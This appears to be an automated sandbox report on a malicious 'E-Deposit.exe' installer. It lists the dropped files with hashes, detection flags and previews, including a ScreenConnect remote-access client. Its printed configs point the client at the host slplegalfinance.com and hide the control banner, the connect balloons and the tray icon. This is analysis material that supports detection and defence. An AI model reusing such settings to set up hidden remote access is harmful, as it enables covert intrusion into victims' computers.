                                                                                      Size (bytes):68096
                                                                                      Entropy (8bit):6.06942231395039
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                      MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                      SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                      SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                      SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                      • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                      • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                      • Filename: estatement020134230003.exe.virus.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):95512
                                                                                      Entropy (8bit):6.504684691533346
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                      MD5:75B21D04C69128A7230A0998086B61AA
                                                                                      SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                      SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                      SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):548864
                                                                                      Entropy (8bit):6.034211651049746
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                      MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                      SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                      SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                      SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1721856
                                                                                      Entropy (8bit):6.639085961200334
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                      MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                      SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                      SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                      SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):260168
                                                                                      Entropy (8bit):6.416438906122177
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                      MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                      SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                      SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                      SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):61208
                                                                                      Entropy (8bit):6.310126082367387
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                      MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                      SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                      SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                      SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):266
                                                                                      Entropy (8bit):4.842791478883622
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):602392
                                                                                      Entropy (8bit):6.176232491934078
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                      MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                      SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                      SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                      SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):266
                                                                                      Entropy (8bit):4.842791478883622
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):842248
                                                                                      Entropy (8bit):6.268561504485627
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                      MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                      SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                      SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                      SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):81688
                                                                                      Entropy (8bit):5.8618809599146005
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                                      MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                                      SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                                      SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                                      SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):266
                                                                                      Entropy (8bit):4.842791478883622
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):951
                                                                                      Entropy (8bit):4.682753739900415
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:389hK55AfdHva/dHvc/dHvidHvJOPdHvLOPdHvP:OhY5AfdHS/dH0/dH6dHAdHKdHX
                                                                                      MD5:A86EDEABE4F506104C9B4A70EC058203
                                                                                      SHA1:90F2C46B4C7EA592EE2027CBE85239878B21CD65
                                                                                      SHA-256:1559FF67FB04A2DEB98A1733D1E1B61DD48D406CF70A0A1D2F386EE65ACD805E
                                                                                      SHA-512:B5261E93D9DD436B885661E57AA2F75654B50675DDF8DEA06AEF0DB0E02AD9194A80DFFAB93A7FDC10B20EB1A1AF36E80E8C4069F7004BD5C69DB675CA17DCA2
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnHide" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowSystemTrayIcon" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowSystemTrayIcon" serializeAs="String">.. <value>false</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):956
                                                                                      Entropy (8bit):5.7620094502294785
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dL9hK6E4dl/m5nudKr2eKHWO+jI/RKLmc3vH:chh7HHFdnHHH+jcRKx3v
                                                                                      MD5:5BEECFFFFC74F49700D1EAC5A1AC5545
                                                                                      SHA1:F7FFBDC8E37A62B480DDD3D04A52F8A3418D5F20
                                                                                      SHA-256:257FA1FF9F14E80025ACBEA5CEB1EE308C32A948289361F8DCDA666C82B8FB82
                                                                                      SHA-512:B0E447C5062116E2B1F6AB5E619D095B63E85076F83E912BF038CEB6DC7984F0E5FF0FF26FFABE5ABD5CCEAE498B1562EB63784A8C019551FAAD3B828FEFBC85
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=slplegalfinance.com&amp;p=443&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Users\user\Desktop\E-Deposit.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):321
                                                                                      Entropy (8bit):5.36509199858051
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                      MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                      SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                      SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                      SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                      Malicious:true
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):746
                                                                                      Entropy (8bit):5.349174276064173
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                      MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                      SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                      SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                      SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                      Category:dropped
                                                                                      Size (bytes):1088392
                                                                                      Entropy (8bit):7.789940577622617
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:QUUGGHn+rUGemcPe9MpKL4Plb2sZWV+tLv0QYu5OPthT+gd:jGHpRPqMpvlqs0O4iO2k
                                                                                      MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                                                                      SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                                                                      SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
                                                                                      SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):234
                                                                                      Entropy (8bit):4.977464602412109
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                      MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                      SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                      SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                      SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                      Malicious:false
                                                                                      Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):4.62694170304723
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                      MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                      SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                      SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
